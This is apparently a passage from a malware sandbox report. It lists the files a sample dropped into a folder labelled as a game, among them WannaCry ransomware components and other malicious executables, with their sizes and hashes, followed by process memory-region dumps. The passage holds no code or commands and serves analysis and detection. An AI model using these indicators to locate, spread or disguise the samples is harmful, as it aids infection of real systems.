                                                                                                                      52c07f98870eabace6ec370b7eb562751e8067e9

                                                                                                                      SHA256

                                                                                                                      5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                                                                                                      SHA512

                                                                                                                      0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_croatian.wnry

                                                                                                                      Filesize

                                                                                                                      38KB

                                                                                                                      MD5

                                                                                                                      17194003fa70ce477326ce2f6deeb270

                                                                                                                      SHA1

                                                                                                                      e325988f68d327743926ea317abb9882f347fa73

                                                                                                                      SHA256

                                                                                                                      3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                                                                                                                      SHA512

                                                                                                                      dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_czech.wnry

                                                                                                                      Filesize

                                                                                                                      39KB

                                                                                                                      MD5

                                                                                                                      537efeecdfa94cc421e58fd82a58ba9e

                                                                                                                      SHA1

                                                                                                                      3609456e16bc16ba447979f3aa69221290ec17d0

                                                                                                                      SHA256

                                                                                                                      5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                                                                                                                      SHA512

                                                                                                                      e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_danish.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      2c5a3b81d5c4715b7bea01033367fcb5

                                                                                                                      SHA1

                                                                                                                      b548b45da8463e17199daafd34c23591f94e82cd

                                                                                                                      SHA256

                                                                                                                      a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                                                                                                                      SHA512

                                                                                                                      490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_dutch.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      7a8d499407c6a647c03c4471a67eaad7

                                                                                                                      SHA1

                                                                                                                      d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                                                                                                                      SHA256

                                                                                                                      2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                                                                                                                      SHA512

                                                                                                                      608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_english.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      fe68c2dc0d2419b38f44d83f2fcf232e

                                                                                                                      SHA1

                                                                                                                      6c6e49949957215aa2f3dfb72207d249adf36283

                                                                                                                      SHA256

                                                                                                                      26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                                                                                                                      SHA512

                                                                                                                      941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_filipino.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      08b9e69b57e4c9b966664f8e1c27ab09

                                                                                                                      SHA1

                                                                                                                      2da1025bbbfb3cd308070765fc0893a48e5a85fa

                                                                                                                      SHA256

                                                                                                                      d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

                                                                                                                      SHA512

                                                                                                                      966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_finnish.wnry

                                                                                                                      Filesize

                                                                                                                      37KB

                                                                                                                      MD5

                                                                                                                      35c2f97eea8819b1caebd23fee732d8f

                                                                                                                      SHA1

                                                                                                                      e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                                      SHA256

                                                                                                                      1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                                      SHA512

                                                                                                                      908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_french.wnry

                                                                                                                      Filesize

                                                                                                                      37KB

                                                                                                                      MD5

                                                                                                                      4e57113a6bf6b88fdd32782a4a381274

                                                                                                                      SHA1

                                                                                                                      0fccbc91f0f94453d91670c6794f71348711061d

                                                                                                                      SHA256

                                                                                                                      9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

                                                                                                                      SHA512

                                                                                                                      4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_german.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      3d59bbb5553fe03a89f817819540f469

                                                                                                                      SHA1

                                                                                                                      26781d4b06ff704800b463d0f1fca3afd923a9fe

                                                                                                                      SHA256

                                                                                                                      2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

                                                                                                                      SHA512

                                                                                                                      95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_greek.wnry

                                                                                                                      Filesize

                                                                                                                      47KB

                                                                                                                      MD5

                                                                                                                      fb4e8718fea95bb7479727fde80cb424

                                                                                                                      SHA1

                                                                                                                      1088c7653cba385fe994e9ae34a6595898f20aeb

                                                                                                                      SHA256

                                                                                                                      e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

                                                                                                                      SHA512

                                                                                                                      24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_indonesian.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      3788f91c694dfc48e12417ce93356b0f

                                                                                                                      SHA1

                                                                                                                      eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

                                                                                                                      SHA256

                                                                                                                      23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

                                                                                                                      SHA512

                                                                                                                      b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_italian.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      30a200f78498990095b36f574b6e8690

                                                                                                                      SHA1

                                                                                                                      c4b1b3c087bd12b063e98bca464cd05f3f7b7882

                                                                                                                      SHA256

                                                                                                                      49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

                                                                                                                      SHA512

                                                                                                                      c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_japanese.wnry

                                                                                                                      Filesize

                                                                                                                      79KB

                                                                                                                      MD5

                                                                                                                      b77e1221f7ecd0b5d696cb66cda1609e

                                                                                                                      SHA1

                                                                                                                      51eb7a254a33d05edf188ded653005dc82de8a46

                                                                                                                      SHA256

                                                                                                                      7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

                                                                                                                      SHA512

                                                                                                                      f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_korean.wnry

                                                                                                                      Filesize

                                                                                                                      89KB

                                                                                                                      MD5

                                                                                                                      6735cb43fe44832b061eeb3f5956b099

                                                                                                                      SHA1

                                                                                                                      d636daf64d524f81367ea92fdafa3726c909bee1

                                                                                                                      SHA256

                                                                                                                      552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

                                                                                                                      SHA512

                                                                                                                      60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_latvian.wnry

                                                                                                                      Filesize

                                                                                                                      40KB

                                                                                                                      MD5

                                                                                                                      c33afb4ecc04ee1bcc6975bea49abe40

                                                                                                                      SHA1

                                                                                                                      fbea4f170507cde02b839527ef50b7ec74b4821f

                                                                                                                      SHA256

                                                                                                                      a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

                                                                                                                      SHA512

                                                                                                                      0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_norwegian.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      ff70cc7c00951084175d12128ce02399

                                                                                                                      SHA1

                                                                                                                      75ad3b1ad4fb14813882d88e952208c648f1fd18

                                                                                                                      SHA256

                                                                                                                      cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

                                                                                                                      SHA512

                                                                                                                      f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_polish.wnry

                                                                                                                      Filesize

                                                                                                                      38KB

                                                                                                                      MD5

                                                                                                                      e79d7f2833a9c2e2553c7fe04a1b63f4

                                                                                                                      SHA1

                                                                                                                      3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

                                                                                                                      SHA256

                                                                                                                      519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

                                                                                                                      SHA512

                                                                                                                      e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_portuguese.wnry

                                                                                                                      Filesize

                                                                                                                      37KB

                                                                                                                      MD5

                                                                                                                      fa948f7d8dfb21ceddd6794f2d56b44f

                                                                                                                      SHA1

                                                                                                                      ca915fbe020caa88dd776d89632d7866f660fc7a

                                                                                                                      SHA256

                                                                                                                      bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

                                                                                                                      SHA512

                                                                                                                      0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_romanian.wnry

                                                                                                                      Filesize

                                                                                                                      50KB

                                                                                                                      MD5

                                                                                                                      313e0ececd24f4fa1504118a11bc7986

                                                                                                                      SHA1

                                                                                                                      e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

                                                                                                                      SHA256

                                                                                                                      70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

                                                                                                                      SHA512

                                                                                                                      c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_russian.wnry

                                                                                                                      Filesize

                                                                                                                      46KB

                                                                                                                      MD5

                                                                                                                      452615db2336d60af7e2057481e4cab5

                                                                                                                      SHA1

                                                                                                                      442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

                                                                                                                      SHA256

                                                                                                                      02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

                                                                                                                      SHA512

                                                                                                                      7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_slovak.wnry

                                                                                                                      Filesize

                                                                                                                      40KB

                                                                                                                      MD5

                                                                                                                      c911aba4ab1da6c28cf86338ab2ab6cc

                                                                                                                      SHA1

                                                                                                                      fee0fd58b8efe76077620d8abc7500dbfef7c5b0

                                                                                                                      SHA256

                                                                                                                      e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

                                                                                                                      SHA512

                                                                                                                      3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_spanish.wnry

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      MD5

                                                                                                                      8d61648d34cba8ae9d1e2a219019add1

                                                                                                                      SHA1

                                                                                                                      2091e42fc17a0cc2f235650f7aad87abf8ba22c2

                                                                                                                      SHA256

                                                                                                                      72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

                                                                                                                      SHA512

                                                                                                                      68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_swedish.wnry

                                                                                                                      Filesize

                                                                                                                      37KB

                                                                                                                      MD5

                                                                                                                      c7a19984eb9f37198652eaf2fd1ee25c

                                                                                                                      SHA1

                                                                                                                      06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

                                                                                                                      SHA256

                                                                                                                      146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

                                                                                                                      SHA512

                                                                                                                      43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_turkish.wnry

                                                                                                                      Filesize

                                                                                                                      41KB

                                                                                                                      MD5

                                                                                                                      531ba6b1a5460fc9446946f91cc8c94b

                                                                                                                      SHA1

                                                                                                                      cc56978681bd546fd82d87926b5d9905c92a5803

                                                                                                                      SHA256

                                                                                                                      6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

                                                                                                                      SHA512

                                                                                                                      ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\msg\m_vietnamese.wnry

                                                                                                                      Filesize

                                                                                                                      91KB

                                                                                                                      MD5

                                                                                                                      8419be28a0dcec3f55823620922b00fa

                                                                                                                      SHA1

                                                                                                                      2e4791f9cdfca8abf345d606f313d22b36c46b92

                                                                                                                      SHA256

                                                                                                                      1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

                                                                                                                      SHA512

                                                                                                                      8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\programoverflow.exe

                                                                                                                      Filesize

                                                                                                                      566KB

                                                                                                                      MD5

                                                                                                                      c4aab3b24b159148d6d47a9e5897e593

                                                                                                                      SHA1

                                                                                                                      7061c2e85de9f3fd51cccdecb8965f1e710d1fe5

                                                                                                                      SHA256

                                                                                                                      03a4d3563a7519542c662b5fd5d61215f3d76a3902717efe11230292ea4bbafc

                                                                                                                      SHA512

                                                                                                                      9bc522ff0d598a1f1425a09a2794584c4991a99bc382b0ee9135311950cdbf2f5331ae041a4b01052735b5fae3a2763ea1b5c01ce679b07fba73c6f75cb4c252

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\reg.reg

                                                                                                                      Filesize

                                                                                                                      25KB

                                                                                                                      MD5

                                                                                                                      aebe09cd7095ec201dc8acc350443242

                                                                                                                      SHA1

                                                                                                                      df7337e051bd02e1fdd4005b63ed45b8ca3d9726

                                                                                                                      SHA256

                                                                                                                      405d47dca73a5d6180db42e90c35931047c666ed1f1d6fab5ead6110c2356cc7

                                                                                                                      SHA512

                                                                                                                      ffc658faf04fee47c1284d439a4c5b3931d2f9bcac9b40e36f59ad0ed4917f0252e639284f817ca84a6da57552f8e0fdf96936987c3f5cf689a537e42b47288d

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\screenscrew.exe

                                                                                                                      Filesize

                                                                                                                      111KB

                                                                                                                      MD5

                                                                                                                      e87a04c270f98bb6b5677cc789d1ad1d

                                                                                                                      SHA1

                                                                                                                      8c14cb338e23d4a82f6310d13b36729e543ff0ca

                                                                                                                      SHA256

                                                                                                                      e03520794f00fb39ef3cfff012f72a5d03c60f89de28dbe69016f6ed151b5338

                                                                                                                      SHA512

                                                                                                                      8784f4d42908e54ecedfb06b254992c63920f43a27903ccedd336daaeed346db44e1f40e7db971735da707b5b32206be1b1571bc0d6a2d6eb90bbf9d1f69de13

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\useroverflow.exe

                                                                                                                      Filesize

                                                                                                                      578KB

                                                                                                                      MD5

                                                                                                                      533d78fdd538bbeee31fb0b72a8cfb7c

                                                                                                                      SHA1

                                                                                                                      cb0e46804e784525f5bece40d51772bbdd9a5dc4

                                                                                                                      SHA256

                                                                                                                      b7a4fcc7f474c091edc09349af5e53915d23f14071d78a3026c92c49d2467989

                                                                                                                      SHA512

                                                                                                                      85e393cbdd2b20da8892173c7951ddf8e75dbfa29cf81fa725a2da56e606b848ea8a6636528d4fe26eca5e6b251406ec870242fe0d44e7863bf22c739d7759d5

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\walliant.exe

                                                                                                                      Filesize

                                                                                                                      5.0MB

                                                                                                                      MD5

                                                                                                                      929335d847f8265c0a8648dd6d593605

                                                                                                                      SHA1

                                                                                                                      0ff9acf1293ed8b313628269791d09e6413fca56

                                                                                                                      SHA256

                                                                                                                      6613acb18cb8bf501fba619f04f8298e5e633cb220c450212bbc9dd2bef9538d

                                                                                                                      SHA512

                                                                                                                      7c9a4d1bec430503cc355dc76955d341e001b06196d4b508cc35d64feb2e8ba30e824e7c3a11c27135d7d99801f45f62a5b558563b4c78f89f5d156a929063fd

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\wannacryptor.exe

                                                                                                                      Filesize

                                                                                                                      3.4MB

                                                                                                                      MD5

                                                                                                                      84c82835a5d21bbcf75a61706d8ab549

                                                                                                                      SHA1

                                                                                                                      5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                                                                                                      SHA256

                                                                                                                      ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                                                                                                      SHA512

                                                                                                                      90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\win7recovery.exe

                                                                                                                      Filesize

                                                                                                                      467KB

                                                                                                                      MD5

                                                                                                                      ab65e866abc51f841465d19aba35fb14

                                                                                                                      SHA1

                                                                                                                      ec79f1f511a199291b0893bc866a788ceac19f6e

                                                                                                                      SHA256

                                                                                                                      2ac0ca4ffda10b1861dd4ae0c2f0131a6400214cb4f5fa33951f3062b784a755

                                                                                                                      SHA512

                                                                                                                      2474905f174635b236e5f6e8f8c497e44435c94edd02ec47d3440c9a216f6840d040e6acc5fe2ec301ada80467f6cf55225d6361c1e7c6c6c7edccb9e7b5a35e

                                                                                                                    • memory/8-61-0x00000000054C0000-0x0000000005552000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      584KB

                                                                                                                    • memory/8-64-0x0000000005490000-0x000000000549A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      40KB

                                                                                                                    • memory/8-54-0x0000000000BC0000-0x0000000000BD0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/1044-146-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/1548-1658-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      480KB

                                                                                                                    • memory/1548-103-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      480KB

                                                                                                                    • memory/1628-39-0x0000000002120000-0x0000000002121000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1628-94-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      656KB

                                                                                                                    • memory/1628-1719-0x0000000002120000-0x0000000002121000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1628-1801-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      656KB

                                                                                                                    • memory/1792-1720-0x0000000002170000-0x0000000002171000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1792-40-0x0000000002170000-0x0000000002171000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1792-1810-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      296KB

                                                                                                                    • memory/1792-93-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      296KB

                                                                                                                    • memory/3684-857-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      864KB

                                                                                                                    • memory/3684-44-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      864KB

                                                                                                                    • memory/3768-95-0x0000000005100000-0x0000000005156000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      344KB

                                                                                                                    • memory/3768-88-0x0000000004D70000-0x0000000004E0C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      624KB

                                                                                                                    • memory/3768-99-0x0000000004E90000-0x0000000004E9A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      40KB

                                                                                                                    • memory/3768-87-0x00000000004A0000-0x0000000000512000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      456KB

                                                                                                                    • memory/4228-1659-0x0000000000400000-0x0000000000650000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/4228-155-0x0000000000400000-0x0000000000650000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/4228-1812-0x0000000000400000-0x0000000000650000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/4536-861-0x0000000000400000-0x000000000068E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.6MB

                                                                                                                    • memory/4608-156-0x0000000000400000-0x0000000000649000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/4608-1660-0x0000000000400000-0x0000000000649000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/4608-1813-0x0000000000400000-0x0000000000649000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/4980-1579-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      480KB

                                                                                                                    • memory/5016-1692-0x0000000075300000-0x0000000075AB0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/5016-1666-0x000000007530E000-0x000000007530F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/5016-1831-0x0000000075300000-0x0000000075AB0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/5016-1-0x0000000000160000-0x00000000001EC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      560KB

                                                                                                                    • memory/5016-2-0x0000000004B40000-0x0000000004B64000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      144KB

                                                                                                                    • memory/5016-0-0x000000007530E000-0x000000007530F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/5016-4-0x0000000005140000-0x00000000056E4000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.6MB

                                                                                                                    • memory/5016-3-0x0000000075300000-0x0000000075AB0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/5932-1771-0x0000000063640000-0x000000006385C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.1MB

                                                                                                                    • memory/5932-1770-0x0000000063860000-0x00000000638D7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      476KB

                                                                                                                    • memory/5932-1769-0x0000000067500000-0x0000000067522000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/5932-1768-0x00000000638E0000-0x0000000063962000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      520KB

                                                                                                                    • memory/5932-1767-0x0000000063970000-0x00000000639F2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      520KB

                                                                                                                    • memory/5932-1766-0x0000000067E60000-0x0000000067E7C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      112KB

                                                                                                                    • memory/5932-1765-0x0000000000B70000-0x0000000000E6E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      3.0MB

                                                                                                                    • memory/5932-1709-0x00000000638E0000-0x0000000063962000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      520KB

                                                                                                                    • memory/5932-1710-0x0000000067500000-0x0000000067522000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/5932-1795-0x0000000000B70000-0x0000000000E6E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      3.0MB

                                                                                                                    • memory/5932-1711-0x0000000000B70000-0x0000000000E6E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      3.0MB

                                                                                                                    • memory/5932-1707-0x0000000063970000-0x00000000639F2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      520KB

                                                                                                                    • memory/5932-1708-0x0000000063640000-0x000000006385C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.1MB